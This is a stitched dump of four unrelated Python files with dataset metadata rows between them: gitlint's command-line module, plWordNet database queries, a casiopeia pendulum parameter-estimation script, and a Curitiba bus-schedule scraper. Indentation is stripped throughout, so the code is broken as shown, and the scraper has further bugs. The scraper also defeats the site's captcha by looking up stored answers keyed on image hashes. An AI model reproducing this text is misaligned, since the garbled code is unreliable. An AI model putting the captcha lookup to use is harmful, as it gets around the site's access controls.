# We don't use logging.getLogger(__main__) here because that will cause DEBUG output to be lost
# when invoking gitlint as a python module (python -m gitlint.cli)
LOG = logging.getLogger("gitlint.cli")
class GitLintUsageError(GitlintError):
""" Exception indicating there is an issue with how gitlint is used. """
pass
def setup_logging():
""" Setup gitlint logging """
root_log = logging.getLogger("gitlint")
root_log.propagate = False # Don't propagate to child loggers, the gitlint root logger handles everything
handler = logging.StreamHandler()
formatter = logging.Formatter(LOG_FORMAT)
handler.setFormatter(formatter)
root_log.addHandler(handler)
root_log.setLevel(logging.ERROR)
def log_system_info():
LOG.debug("Platform: %s", platform.platform())
LOG.debug("Python version: %s", sys.version)
LOG.debug("Git version: %s", git_version())
LOG.debug("Gitlint version: %s", gitlint.__version__)
LOG.debug("GITLINT_USE_SH_LIB: %s", os.environ.get("GITLINT_USE_SH_LIB", "[NOT SET]"))
LOG.debug("DEFAULT_ENCODING: %s", gitlint.utils.DEFAULT_ENCODING)
def build_config( # pylint: disable=too-many-arguments
target, config_path, c, extra_path, ignore, contrib, ignore_stdin, staged, verbose, silent, debug
):
""" Creates a LintConfig object based on a set of commandline parameters. """
config_builder = LintConfigBuilder()
# Config precedence:
# First, load default config or config from configfile
if config_path:
config_builder.set_from_config_file(config_path)
elif os.path.exists(DEFAULT_CONFIG_FILE):
config_builder.set_from_config_file(DEFAULT_CONFIG_FILE)
# Then process any commandline configuration flags
config_builder.set_config_from_string_list(c)
# Finally, overwrite with any convenience commandline flags
if ignore:
config_builder.set_option('general', 'ignore', ignore)
if contrib:
config_builder.set_option('general', 'contrib', contrib)
if ignore_stdin:
config_builder.set_option('general', 'ignore-stdin', ignore_stdin)
if silent:
config_builder.set_option('general', 'verbosity', 0)
elif verbose > 0:
config_builder.set_option('general', 'verbosity', verbose)
if extra_path:
config_builder.set_option('general', 'extra-path', extra_path)
if target:
config_builder.set_option('general', 'target', target)
if debug:
config_builder.set_option('general', 'debug', debug)
if staged:
config_builder.set_option('general', 'staged', staged)
config = config_builder.build()
return config, config_builder
def get_stdin_data():
""" Helper function that returns data send to stdin or False if nothing is send """
# STDIN can only be 3 different types of things ("modes")
# 1. An interactive terminal device (i.e. a TTY -> sys.stdin.isatty() or stat.S_ISCHR)
# 2. A (named) pipe (stat.S_ISFIFO)
# 3. A regular file (stat.S_ISREG)
# Technically, STDIN can also be other device type like a named unix socket (stat.S_ISSOCK), but we don't
# support that in gitlint (at least not today).
#
# Now, the behavior that we want is the following:
# If someone sends something directly to gitlint via a pipe or a regular file, read it. If not, read from the
# local repository.
# Note that we don't care about whether STDIN is a TTY or not, we only care whether data is via a pipe or regular
# file.
# However, in case STDIN is not a TTY, it HAS to be one of the 2 other things (pipe or regular file), even if
# no-one is actually sending anything to gitlint over them. In this case, we still want to read from the local
# repository.
# To support this use-case (which is common in CI runners such as Jenkins and Gitlab), we need to actually attempt
# to read from STDIN in case it's a pipe or regular file. In case that fails, then we'll fall back to reading
# from the local repo.
mode = os.fstat(sys.stdin.fileno()).st_mode
stdin_is_pipe_or_file = stat.S_ISFIFO(mode) or stat.S_ISREG(mode)
if stdin_is_pipe_or_file:
input_data = sys.stdin.read()
# Only return the input data if there's actually something passed
# i.e. don't consider empty piped data
if input_data:
return str(input_data)
return False
def build_git_context(lint_config, msg_filename, refspec):
""" Builds a git context based on passed parameters and order of precedence """
# Determine which GitContext method to use if a custom message is passed
from_commit_msg = GitContext.from_commit_msg
if lint_config.staged:
LOG.debug("Fetching additional meta-data from staged commit")
from_commit_msg = lambda message: GitContext.from_staged_commit(message, lint_config.target) # noqa
# Order of precedence:
# 1. Any data specified via --msg-filename
if msg_filename:
LOG.debug("Using --msg-filename.")
return from_commit_msg(str(msg_filename.read()))
# 2. Any data sent to stdin (unless stdin is being ignored)
if not lint_config.ignore_stdin:
stdin_input = get_stdin_data()
if stdin_input:
LOG.debug("Stdin data: '%s'", stdin_input)
LOG.debug("Stdin detected and not ignored. Using as input.")
return from_commit_msg(stdin_input)
if lint_config.staged:
raise GitLintUsageError("The 'staged' option (--staged) can only be used when using '--msg-filename' or "
"when piping data to gitlint via stdin.")
# 3. Fallback to reading from local repository
LOG.debug("No --msg-filename flag, no or empty data passed to stdin. Using the local repo.")
return GitContext.from_local_repository(lint_config.target, refspec)
def handle_gitlint_error(ctx, exc):
""" Helper function to handle exceptions """
if isinstance(exc, GitContextError):
click.echo(exc)
ctx.exit(GIT_CONTEXT_ERROR_CODE)
elif isinstance(exc, GitLintUsageError):
click.echo(f"Error: {exc}")
ctx.exit(USAGE_ERROR_CODE)
elif isinstance(exc, LintConfigError):
click.echo(f"Config Error: {exc}")
ctx.exit(CONFIG_ERROR_CODE)
class ContextObj:
""" Simple class to hold data that is passed between Click commands via the Click context. """
def __init__(self, config, config_builder, refspec, msg_filename, gitcontext=None):
self.config = config
self.config_builder = config_builder
self.refspec = refspec
self.msg_filename = msg_filename
self.gitcontext = gitcontext
@click.group(invoke_without_command=True, context_settings={'max_content_width': 120},
epilog="When no COMMAND is specified, gitlint defaults to 'gitlint lint'.")
@click.option('--target', envvar='GITLINT_TARGET',
type=click.Path(exists=True, resolve_path=True, file_okay=False, readable=True),
help="Path of the target git repository. [default: current working directory]")
@click.option('-C', '--config', type=click.Path(exists=True, dir_okay=False, readable=True, resolve_path=True),
help=f"Config file location [default: {DEFAULT_CONFIG_FILE}]")
@click.option('-c', multiple=True,
help="Config flags in format <rule>.<option>=<value> (e.g.: -c T1.line-length=80). " +
"Flag can be used multiple times to set multiple config values.") # pylint: disable=bad-continuation
@click.option('--commits', envvar='GITLINT_COMMITS', default=None, help="The range of commits to lint. [default: HEAD]")
@click.option('-e', '--extra-path', envvar='GITLINT_EXTRA_PATH',
help="Path to a directory or python module with extra user-defined rules",
type=click.Path(exists=True, resolve_path=True, readable=True))
@click.option('--ignore', envvar='GITLINT_IGNORE', default="", help="Ignore rules (comma-separated by id or name).")
@click.option('--contrib', envvar='GITLINT_CONTRIB', default="",
help="Contrib rules to enable (comma-separated by id or name).")
@click.option('--msg-filename', type=click.File(), help="Path to a file containing a commit-msg.")
@click.option('--ignore-stdin', envvar='GITLINT_IGNORE_STDIN', is_flag=True,
help="Ignore any stdin data. Useful for running in CI server.")
@click.option('--staged', envvar='GITLINT_STAGED', is_flag=True,
help="Read staged commit meta-info from the local repository.")
@click.option('-v', '--verbose', envvar='GITLINT_VERBOSITY', count=True, default=0,
help="Verbosity, more v's for more verbose output (e.g.: -v, -vv, -vvv). [default: -vvv]", )
@click.option('-s', '--silent', envvar='GITLINT_SILENT', is_flag=True,
help="Silent mode (no output). Takes precedence over -v, -vv, -vvv.")
@click.option('-d', '--debug', envvar='GITLINT_DEBUG', help="Enable debugging output.", is_flag=True)
@click.version_option(version=gitlint.__version__)
@click.pass_context
def cli( # pylint: disable=too-many-arguments
ctx, target, config, c, commits, extra_path, ignore, contrib,
msg_filename, ignore_stdin, staged, verbose, silent, debug,
):
""" Git lint tool, checks your git commit messages for styling issues
Documentation: http://jorisroovers.github.io/gitlint
"""
try:
if debug:
logging.getLogger("gitlint").setLevel(logging.DEBUG)
LOG.debug("To report issues, please visit https://github.com/jorisroovers/gitlint/issues")
log_system_info()
# Get the lint config from the commandline parameters and
# store it in the context (click allows storing an arbitrary object in ctx.obj).
config, config_builder = build_config(target, config, c, extra_path, ignore, contrib,
ignore_stdin, staged, verbose, silent, debug)
LOG.debug("Configuration\n%s", config)
ctx.obj = ContextObj(config, config_builder, commits, msg_filename)
# If no subcommand is specified, then just lint
if ctx.invoked_subcommand is None:
ctx.invoke(lint)
except GitlintError as e:
handle_gitlint_error(ctx, e)
@cli.command("lint")
@click.pass_context
def lint(ctx):
""" Lints a git repository [default command] """
lint_config = ctx.obj.config
refspec = ctx.obj.refspec
msg_filename = ctx.obj.msg_filename
gitcontext = build_git_context(lint_config, msg_filename, refspec)
# Set gitcontext in the click context, so we can use it in command that are ran after this
# in particular, this is used by run-hook
ctx.obj.gitcontext = gitcontext
number_of_commits = len(gitcontext.commits)
# Exit if we don't have commits in the specified range. Use a 0 exit code, since a popular use-case is one
# where users are using --commits in a check job to check the commit messages inside a CI job. By returning 0, we
# ensure that these jobs don't fail if for whatever reason the specified commit range is empty.
if number_of_commits == 0:
LOG.debug(u'No commits in range "%s"', refspec)
ctx.exit(0)
LOG.debug(u'Linting %d commit(s)', number_of_commits)
general_config_builder = ctx.obj.config_builder
last_commit = gitcontext.commits[-1]
# Let's get linting!
first_violation = True
exit_code = 0
for commit in gitcontext.commits:
# Build a config_builder taking into account the commit specific config (if any)
config_builder = general_config_builder.clone()
config_builder.set_config_from_commit(commit)
# Create a deepcopy from the original config, so we have a unique config object per commit
# This is important for configuration rules to be able to modifying the config on a per commit basis
commit_config = config_builder.build(copy.deepcopy(lint_config))
# Actually do the linting
linter = GitLinter(commit_config)
violations = linter.lint(commit)
# exit code equals the total number of violations in all commits
exit_code += len(violations)
if violations:
# Display the commit hash & new lines intelligently
if number_of_commits > 1 and commit.sha:
linter.display.e("{0}Commit {1}:".format(
"\n" if not first_violation or commit is last_commit else "",
commit.sha[:10]
))
linter.print_violations(violations)
first_violation = False
# cap actual max exit code because bash doesn't like exit codes larger than 255:
# http://tldp.org/LDP/abs/html/exitcodes.html
exit_code = min(MAX_VIOLATION_ERROR_CODE, exit_code)
LOG.debug("Exit Code = %s", exit_code)
ctx.exit(exit_code)
@cli.command("install-hook")
@click.pass_context
def install_hook(ctx):
""" Install gitlint as a git commit-msg hook. """
try:
hooks.GitHookInstaller.install_commit_msg_hook(ctx.obj.config)
hook_path = hooks.GitHookInstaller.commit_msg_hook_path(ctx.obj.config)
click.echo(f"Successfully installed gitlint commit-msg hook in {hook_path}")
ctx.exit(0)
except hooks.GitHookInstallerError as e:
click.echo(e, err=True)
ctx.exit(GIT_CONTEXT_ERROR_CODE)
@cli.command("uninstall-hook")
@click.pass_context
def uninstall_hook(ctx):
""" Uninstall gitlint commit-msg hook. """
try:
hooks.GitHookInstaller.uninstall_commit_msg_hook(ctx.obj.config)
hook_path = hooks.GitHookInstaller.commit_msg_hook_path(ctx.obj.config)
click.echo(f"Successfully uninstalled gitlint commit-msg hook from {hook_path}")
ctx.exit(0)
except hooks.GitHookInstallerError as e:
click.echo(e, err=True)
ctx.exit(GIT_CONTEXT_ERROR_CODE)
@cli.command("run-hook")
@click.pass_context
def run_hook(ctx):
""" Runs the gitlint commit-msg hook. """
exit_code = 1
while exit_code > 0:
try:
click.echo("gitlint: checking commit message...")
ctx.invoke(lint)
except GitlintError as e:
handle_gitlint_error(ctx, e)
except click.exceptions.Exit as e:
# Flush stderr andstdout, this resolves an issue with output ordering in Cygwin
sys.stderr.flush()
sys.stdout.flush()
exit_code = e.exit_code
if exit_code == 0:
click.echo("gitlint: " + click.style("OK", fg='green') + " (no violations in commit message)")
continue
click.echo("-----------------------------------------------")
click.echo("gitlint: " + click.style("Your commit message contains violations.", fg='red'))
value = None
while value not in ["y", "n", "e"]:
click.echo("Continue with commit anyways (this keeps the current commit message)? "
"[y(es)/n(no)/e(dit)] ", nl=False)
# Ideally, we'd want to use click.getchar() or click.prompt() to get user's input here instead of
# input(). However, those functions currently don't support getting answers from stdin.
# This wouldn't be a huge issue since this is unlikely to occur in the real world,
# were it not that we use a stdin to pipe answers into gitlint in our integration tests.
# If that ever changes, we can revisit this.
# Related click pointers:
# - https://github.com/pallets/click/issues/1370
# - https://github.com/pallets/click/pull/1372
# - From https://click.palletsprojects.com/en/7.x/utils/#getting-characters-from-terminal
# Note that this function will always read from the terminal, even if stdin is instead a pipe.
value = input()
if value == "y":
LOG.debug("run-hook: commit message accepted")
exit_code = 0
elif value == "e":
LOG.debug("run-hook: editing commit message")
msg_filename = ctx.obj.msg_filename
if msg_filename:
msg_filename.seek(0)
editor = os.environ.get("EDITOR", DEFAULT_COMMIT_MSG_EDITOR)
msg_filename_path = os.path.realpath(msg_filename.name)
LOG.debug("run-hook: %s %s", editor, msg_filename_path)
shell(editor + " " + msg_filename_path)
else:
click.echo("Editing only possible when --msg-filename is specified.")
ctx.exit(exit_code)
elif value == "n":
LOG.debug("run-hook: commit message declined")
click.echo("Commit aborted.")
click.echo("Your commit message: ")
click.echo("-----------------------------------------------")
click.echo(ctx.obj.gitcontext.commits[0].message.full)
click.echo("-----------------------------------------------")
ctx.exit(exit_code)
ctx.exit(exit_code)
@cli.command("generate-config")
@click.pass_context
def generate_config(ctx):
""" Generates a sample gitlint config file. """
path = click.prompt('Please specify a location for the sample gitlint config file', default=DEFAULT_CONFIG_FILE)
path = os.path.realpath(path)
dir_name = os.path.dirname(path)
if not os.path.exists(dir_name):
click.echo(f"Error: Directory '{dir_name}' does not exist.", err=True)
ctx.exit(USAGE_ERROR_CODE)
elif os.path.exists(path):
click.echo(f"Error: File \"{path}\" already exists.", err=True)
ctx.exit(USAGE_ERROR_CODE)
LintConfigGenerator.generate_config(path)
click.echo(f"Successfully generated {path}")
ctx.exit(0)
# Let's Party!
setup_logging()
if __name__ == "__main__":
# pylint: disable=no-value-for-parameter
cli() # pragma: no cover
| mit | 6,357,240,374,226,622,000 | 42.684932 | 120 | 0.648531 | false | 3.819924 | true | false | false |
erikdab/pyrelaxmapper | pyrelaxmapper/plwn/queries.py | 1 | 6013 | # -*- coding: utf-8 -*-
"""plWordNet DB queries."""
from sqlalchemy import orm
from sqlalchemy.sql import func
from sqlalchemy.sql.expression import label
from pyrelaxmapper.plwn.models import (Parameter, LexicalUnit, Synset, SynsetRelation,
RelationType, UnitSynset, LexicalRelation)
# TODO: This isn't the proper version number...
def version(session):
"""Query plWordNet for format version."""
value = session.query(Parameter).filter_by(name='programversion').first().value
return value[value.rfind(' ')+1:]
def reltypes(session, types=None):
"""Query for hipernyms.
Parameters
----------
session : orm.session.Session
types : list
RelationType to select (default [10, 11], hiper/hiponyms)
"""
return (session.query(RelationType)
)
def reltypes_pwn_plwn(session):
"""Query plWN for PWN-plWN relation types."""
return (session.query(RelationType.id_)
.filter(RelationType.name.like('%plWN%'))
# Don't take potential, only take certain candidates
.filter(~ RelationType.shortcut.in_(['po_pa', 'po_ap'])))
def pwn_mappings(session, pos=None, pos_en=None):
"""Query plWN for already mapped synsets between plWN and PWN.
Selects: polish synset id, english synset unitsstr, POS
Source: Polish - Target (child): English
RelationType: selects only plWN-PWN mappings
does not take 'po_pa, po_ap' relation types.
POS: Only selects nouns
Parameters
----------
session : orm.session.Session
pos : list of int
pos_en : list of int
"""
if not pos:
pos = [2]
if not pos_en:
pos_en = [6]
rel_types = reltypes_pwn_plwn(session)
syns_en = orm.aliased(Synset)
uas_pl = orm.aliased(UnitSynset)
lunit_pl = orm.aliased(LexicalUnit)
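    # The aliases let the Polish unit/synset tables and the English synset table
    # be joined in a single query through SynsetRelation.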
return (session.query(label('pl_uid', Synset.id_), label('en_uid', syns_en.id_),
syns_en.unitsstr, LexicalUnit.pos)
.join(SynsetRelation, Synset.id_ == SynsetRelation.parent_id)
.join(syns_en, SynsetRelation.child_id == syns_en.id_)
.join(UnitSynset, syns_en.id_ == UnitSynset.syn_id)
.join(LexicalUnit, UnitSynset.lex_id == LexicalUnit.id_)
.join(uas_pl, Synset.id_ == uas_pl.syn_id)
.join(lunit_pl, uas_pl.lex_id == lunit_pl.id_)
.join(RelationType, SynsetRelation.rel_id == RelationType.id_)
.filter(RelationType.id_.in_(rel_types))
.filter(LexicalUnit.pos.in_(pos_en))
.filter(lunit_pl.pos.in_(pos))
.group_by(Synset.id_, syns_en.id_, syns_en.unitsstr, LexicalUnit.pos)
.order_by(Synset.id_)
)
def lunits(session, pos=None):
"""Query for lexical units, their lemma and POS.
Parameters
----------
session : orm.session.Session
pos : list
Parts of speech to select (default [2])
    Returns
    -------
    sqlalchemy.orm.query.Query
        Lexical units with the requested parts of speech, ordered by id.
"""
if not pos:
pos = [2]
return (session.query(LexicalUnit)
.filter(LexicalUnit.pos.in_(pos))
.order_by(LexicalUnit.id_)
)
def synsets(session, pos=None):
"""Query for synsets, concatenated ids and lemmas of their LUs.
Parameters
----------
session : orm.session.Session
pos : list
Parts of speech to select (default [2])
"""
if not pos:
pos = [2]
return (session.query(Synset.id_, Synset.definition,
label('lex_ids', func.group_concat(UnitSynset.lex_id)),
label('unitindexes', func.group_concat(UnitSynset.unitindex))
)
.join(UnitSynset)
.join(LexicalUnit)
.filter(LexicalUnit.pos.in_(pos))
.order_by(Synset.id_)
.group_by(Synset.id_)
)
def synset_relations(session, types, pos=None):
"""Query for hipernyms.
Parameters
----------
session : orm.session.Session
types : list
RelationType to select (default [10, 11], hiper/hiponyms)
"""
query = (session.query(SynsetRelation.parent_id, SynsetRelation.child_id,
SynsetRelation.rel_id)
.order_by(SynsetRelation.parent_id)
)
if types:
types = types if isinstance(types, list) else [types]
query = query.filter(SynsetRelation.rel_id.in_(types))
if pos:
pos = pos if isinstance(pos, list) else [pos]
query = (query
.join(UnitSynset, SynsetRelation.parent_id == UnitSynset.syn_id)
.join(LexicalUnit)
.filter(LexicalUnit.pos.in_(pos))
.group_by(SynsetRelation.parent_id, SynsetRelation.child_id,
SynsetRelation.rel_id)
)
return query
def lexical_relations(session, reltypes, pos=None):
"""Query for hipernyms.
Parameters
----------
session : orm.session.Session
reltypes : list
RelationType to select
pos : list
Parts of speech to extract. If empty, extract all.
"""
query = (session.query(LexicalRelation.parent_id, LexicalRelation.child_id,
LexicalRelation.rel_id)
.order_by(LexicalRelation.parent_id)
)
if reltypes:
reltypes = reltypes if isinstance(reltypes, list) else [reltypes]
query = (query
.join(RelationType)
.filter(RelationType.id_.in_(reltypes) |
RelationType.parent_id.in_(reltypes)))
if pos:
pos = pos if isinstance(pos, list) else [pos]
query = (query
.join(LexicalUnit, LexicalRelation.parent_id == LexicalUnit.id_)
.filter(LexicalUnit.pos.in_(pos))
.group_by(LexicalRelation.parent_id, LexicalRelation.child_id,
LexicalRelation.rel_id)
)
return query
| lgpl-3.0 | -6,753,829,671,476,212,000 | 31.327957 | 87 | 0.578247 | false | 3.615755 | false | false | false |
adbuerger/casiopeia | concept_tests/sd_check_pendulum_linear.py | 1 | 4929 | import casadi as ca
import pylab as pl
import casiopeia as cp
import os
# (Model and data taken from: Diehl, Moritz: Course on System Identification,
# exercise 7, SYSCOP, IMTEK, University of Freiburg, 2014/2015)
# Defining constant problem parameters:
#
# - m: representing the ball of the mass in kg
# - L: the length of the pendulum bar in meters
# - g: the gravity constant in m/s^2
# - psi: the actuation angle of the manuver in radians, which stays
# constant for this problem
m = 1.0
L = 3.0
g = 9.81
# psi = pl.pi / 2.0
psi = pl.pi / (180.0 * 2)
# System
x = ca.MX.sym("x", 2)
p = ca.MX.sym("p", 1)
u = ca.MX.sym("u", 1)
# f = ca.vertcat([x[1], p[0]/(m*(L**2))*(u-x[0]) - g/L * pl.sin(x[0])])
f = ca.vertcat(x[1], p[0]/(m*(L**2))*(u-x[0]) - g/L * x[0])
phi = x
system = cp.system.System(x = x, u = u, p = p, f = f, phi = phi)
data = pl.loadtxt('data_pendulum.txt')
time_points = data[:500, 0]
numeas = data[:500, 1]
wmeas = data[:500, 2]
N = time_points.size
ydata = pl.array([numeas,wmeas])
udata = [psi] * (N-1)
ptrue = [3.0]
sim_true = cp.sim.Simulation(system, ptrue)
sim_true.run_system_simulation(time_points = time_points, \
x0 = ydata[:, 0], udata = udata)
# pl.figure()
# pl.plot(time_points, pl.squeeze(sim_true.simulation_results[0,:]))
# pl.plot(time_points, pl.squeeze(sim_true.simulation_results[1,:]))
# pl.show()
p_test = []
sigma = 0.1
wv = (1. / sigma**2) * pl.ones(ydata.shape)
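# Measurement weights: inverse variance 1 / sigma^2 for every data point.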
repetitions = 100
for k in range(repetitions):
y_randn = sim_true.simulation_results + \
sigma * (pl.randn(*sim_true.simulation_results.shape))
pe_test = cp.pe.LSq(system = system, time_points = time_points,
udata = udata, xinit = y_randn, ydata = y_randn, wv = wv, pinit = 1)
pe_test.run_parameter_estimation()
p_test.append(pe_test.estimated_parameters)
p_mean = pl.mean(p_test)
p_std = pl.std(p_test, ddof=0)
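# ddof=0 gives the population standard deviation over the Monte Carlo repetitions.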
pe_test.compute_covariance_matrix()
pe_test.print_estimation_results()
# Generate report
print("\np_mean = " + str(ca.DM(p_mean)))
print("phat_last_exp = " + str(ca.DM(pe_test.estimated_parameters)))
print("\np_sd = " + str(ca.DM(p_std)))
print("sd_from_covmat = " + str(ca.diag(ca.sqrt(pe_test.covariance_matrix))))
print("beta = " + str(pe_test.beta))
print("\ndelta_abs_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix)))))
print("delta_rel_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix))) / ca.DM(p_std)))
fname = os.path.basename(__file__)[:-3] + ".rst"
report = open(fname, "w")
report.write( \
'''Concept test: covariance matrix computation
===========================================
Simulate system. Then: add gaussian noise N~(0, sigma^2), estimate,
store estimated parameter, repeat.
.. code-block:: python
y_randn = sim_true.simulation_results + sigma * \
(np.random.randn(*sim_true.simulation_results.shape))
Afterwards, compute standard deviation of estimated parameters,
and compare to single covariance matrix computation done in PECas.
''')
prob = "ODE, 2 states, 1 control, 1 param, (pendulum linear)"
report.write(prob)
report.write("\n" + "-" * len(prob) + "\n\n.. code-block:: python")
report.write( \
'''.. code-block:: python
---------------------- casiopeia system definition -----------------------
The system is a dynamic system defined by a set of
explicit ODEs xdot which establish the system state x:
xdot = f(t, u, x, p, we, wu)
and by an output function phi which sets the system measurements:
y = phi(t, x, p).
Particularly, the system has:
1 inputs u
1 parameters p
2 states x
2 outputs phi
Where xdot is defined by:
xdot[0] = x[1]
xdot[1] = (((p/9)*(u-x[0]))-(3.27*x[0]))
And where phi is defined by:
y[0] = x[0]
y[1] = x[1]
''')
report.write("\n**Test results:**\n\n.. code-block:: python")
report.write("\n\n repetitions = " + str(repetitions))
report.write("\n sigma = " + str(sigma))
report.write("\n\n p_true = " + str(ca.DM(ptrue)))
report.write("\n\n p_mean = " + str(ca.DM(p_mean)))
report.write("\n phat_last_exp = " + \
str(ca.DM(pe_test.estimated_parameters)))
report.write("\n\n p_sd = " + str(ca.DM(p_std)))
report.write("\n sd_from_covmat = " \
+ str(ca.diag(ca.sqrt(pe_test.covariance_matrix))))
report.write("\n beta = " + str(pe_test.beta))
report.write("\n\n delta_abs_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix)))))
report.write("\n delta_rel_sd = " + str(ca.fabs(ca.DM(p_std) - \
ca.diag(ca.sqrt(pe_test.covariance_matrix))) / ca.DM(p_std)) \
+ "\n")
report.close()
try:
os.system("rst2pdf " + fname)
except:
print("Generating PDF report failed, is rst2pdf installed correctly?")
| lgpl-3.0 | -143,478,416,205,076,940 | 26.536313 | 78 | 0.602759 | false | 2.720199 | true | false | false |
devlware/Ontime | Ontime.py | 1 | 10829 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Ontime
# Software to download the schedule for all public bus lines in Curitiba.
#
# Copyright (C) 2011 by Diego W. Antunes <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import urllib2
from urllib2 import Request, urlopen, URLError, HTTPError
from BeautifulSoup import BeautifulSoup
import os
from os.path import join, getsize
import tempfile
import random
import thread, time
import threading
import string
import sqlite3
import getopt, sys
import hashlib
import datetime
__version__ = "1.0"
__author__ = 'Diego W. Antunes'
__license__ = 'MIT'
class Config(object):
""" """
baseurl = 'http://www.urbs.curitiba.pr.gov.br'
horariourl = 'PORTAL/tabelahorario/'
captchaurl = 'PORTAL/tabelahorario/cap.php'
silent = False
DIAS = ["todos", "util", "sabado", "domingo"]
#SENTIDOS = ["ida", "volta"]
#PERIODOS = ["manha", "entrepico", "tarde"]
DICT_DIAS = dict(zip("0123", DIAS))
#DICT_SENTIDOS = dict(zip("IV", SENTIDOS))
database = 'ontime.sqlite'
CreateCaptchaCode = 'CREATE TABLE IF NOT EXISTS CaptchaCode \
(pk INTEGER PRIMARY KEY NOT NULL, shasum TEXT, code TEXT)'
CreateCaptchaSha1 = 'CREATE TABLE IF NOT EXISTS CaptchaSha1 \
(pk INTEGER PRIMARY KEY NOT NULL, fn TEXT, shasum TEXT, size INTEGER, occurrences INTEGER)'
CreateSchedule = 'CREATE TABLE IF NOT EXISTS Schedule \
(pk INTEGER PRIMARY KEY NOT NULL, time TEXT, hasElevator INTEGER)'
CreatePoint = 'CREATE TABLE IF NOT EXISTS Point \
(pk INTEGER PRIMARY KEY NOT NULL, pointName TEXT validity TEXT, weekDay INTEGER)'
CreateLine = 'CREATE TABLE IF NOT EXISTS Line \
(pk INTEGER PRIMARY KEY NOT NULL, lineName TEXT)'
class OntimeException(Exception):
"""Captcha exception."""
class Schedule(object):
""" """
def __init__(self):
        self.pk = None
        self.time = None
        self.hasElevator = None
class Point(object):
""" """
    def __init__(self, weekDay=None):
        self.pk = None
        self.pointName = None
        self.validity = None
        self.scheduleID = None
        self.setWeekDay(weekDay)
def setWeekDay(self, day):
""" """
self._weekDay = day
class Line(object):
""" """
    def __init__(self, pk, lineName=None):
        self._pk = pk
        self._lineName = None
        self.setLineName(lineName)
    def setPk(self, aCode):
        self._pk = aCode
def setLineName(self, line):
self._lineName = line
def data(self):
return self._data
class IMBDataBase(Config):
""" """
_conn = None
_cursor = None
    def __init__(self, database=None):
        """ """
        self._conn = sqlite3.connect(database or Config.database)
self._cursor = self._conn.cursor()
try:
# Create all the tables necessary to the project
            self._cursor.execute(Config.CreateCaptchaSha1)
            self._cursor.execute(Config.CreateCaptchaCode)
            self._cursor.execute(Config.CreateSchedule)
            self._cursor.execute(Config.CreatePoint)
            self._cursor.execute(Config.CreateLine)
except sqlite3.Error, e:
print "Could not create table...", e.args[0]
sys.exit(1)
try:
self._conn.commit()
except sqlite3.Error, e:
print "Could no commit table creation...", e.args[0]
def saveData(self, fn, sha, size):
""" """
try:
self._cursor.execute('SELECT pk, occurrences FROM CaptchaSha1 WHERE shasum = ?', (sha, ))
row = self._cursor.fetchone()
if row:
pk = row[0]
occ = row[1]
try:
aTuple = (occ+1, pk, )
self._cursor.execute('UPDATE CaptchaSha1 SET occurrences = ? WHERE pk = ?', aTuple)
self._conn.commit()
except sqlite3.Error, e:
print "An error occurred:", e.args[0]
sys.exit(1)
else:
t = (fn, sha, size, 1)
try:
self._cursor.execute('INSERT INTO CaptchaSha1 (fn, shasum, size, occurrences) values (?, ?, ?, ?)', t)
self._conn.commit()
except sqlite3.Error, e:
print "An error occurred:", e.args[0]
sys.exit(1)
except sqlite3.Error, e:
print "An error occurred:", e.args[0]
sys.exit(2)
def closeDB(self):
""" """
self._cursor.close()
self._conn.close()
class MyThread(threading.Thread):
    """Worker thread used to download captcha images."""
    def __init__(self, name=None):
        """ """
        threading.Thread.__init__(self, name=name)
        print "%s started!" % self.getName()
def run(self):
""" """
cookie = urllib2.HTTPCookieProcessor()
debug = urllib2.HTTPHandler()
self._opener = urllib2.build_opener(debug, cookie)
        self._baseurl = Config.baseurl
self._data = { 'info' : [] }
urllib2.install_opener(self._opener)
    def request(self, url, handler, data=None):
"""Method used to request server/carrier data."""
final = self._baseurl + '/' + url
request = urllib2.Request(final)
request.add_header('User-Agent', "Ontime/%s" % __version__)
request.add_header('Accept-Encoding', 'gzip')
if data is not None:
request.add_data(data)
descriptor = self._opener.open(request)
data = descriptor.read()
descriptor.close()
soup = BeautifulSoup(data)
handler(soup)
def getCaptcha(self, data = None):
        req = urllib2.Request(Config.captchaurl)
try:
response = urllib2.urlopen(req)
except URLError, e:
if hasattr(e, 'reason'):
print('We failed to reach a server.')
print('Reason: ', e.reason)
elif hasattr(e, 'code'):
print('The server couldn\'t fulfill the request.')
print('Error code: ', e.code)
else:
print('no problems found')
imgData = response.read()
imgFilename = ''.join(random.choice(string.ascii_uppercase + string.digits) for x in range(10)) + '.png'
imgFileString = str(imgData)
h = hashlib.sha1()
h.update(imgFileString)
fileHash = h.hexdigest()
self._cursor.execute('SELECT code FROM CaptchaCode WHERE shasum = ?', (fileHash, ))
self.captchaCode = self._cursor.fetchone()[0]
if not self.captchaCode:
return None
return self.captchaCode
def _parseMenu(self, soup):
box = soup.find('select')
        if box is None:
            return
        else:
            boxd = box.findAll()
menu = soup.find(id="cboLinha")
menuOps = menu.findAll("option")
a = []
b = []
for i in menuOps:
a.append(i.contents[0])
b.append(i.attrs[0][1])
"""
        Code to store this information in the database:
for i in range(len(a)):
cursor.execute('INSERT INTO Line (lineName, pk) values (?, ?)', (a[i], int(str(b[i]))))
"""
tipoDia = soup.find(id="cboTipoDia")
        opcoes = tipoDia.findAll("option")  # returns a list
for i in opcoes:
print i.contents
print i.attrs[0][1]
        # how to get the number from an option:
        # a[1].attrs[0][1]
